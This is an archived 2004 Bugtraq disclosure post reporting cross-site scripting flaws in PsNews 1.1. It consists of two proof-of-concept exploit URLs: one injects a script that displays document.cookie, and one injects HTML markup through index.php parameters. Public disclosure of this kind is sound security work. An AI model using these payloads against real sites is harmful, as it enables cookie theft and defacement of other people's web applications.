[36413] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Bug XSS in PsNews 1.1

daemon@ATHENA.MIT.EDU (Michal Blaszczak)
Wed Sep 8 10:15:12 2004

Date: 5 Sep 2004 18:55:24 -0000
Message-ID: <20040905185524.32251.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Michal Blaszczak <wacky@nicponie.org>
To: bugtraq@securityfocus.com



АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА
*5-9-2004
*Autor: wacky
*E-mail: wacky@nicponie.org
*WWW: http://www.nicponie.org
АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА
-----------------------------------------------
|BugCross-Site Scripting (XSS) w PsNews 1.1 | 
-----------------------------------------------

Exploit:

a) 
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>

b)
http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>

АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА
http://www.nicponie.org/


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[36413] in bugtraq

Bug XSS in PsNews 1.1

daemon@ATHENA.MIT.EDU (Michal Blaszczak)Wed Sep 8 10:15:12 2004

daemon@ATHENA.MIT.EDU (Michal Blaszczak)
Wed Sep 8 10:15:12 2004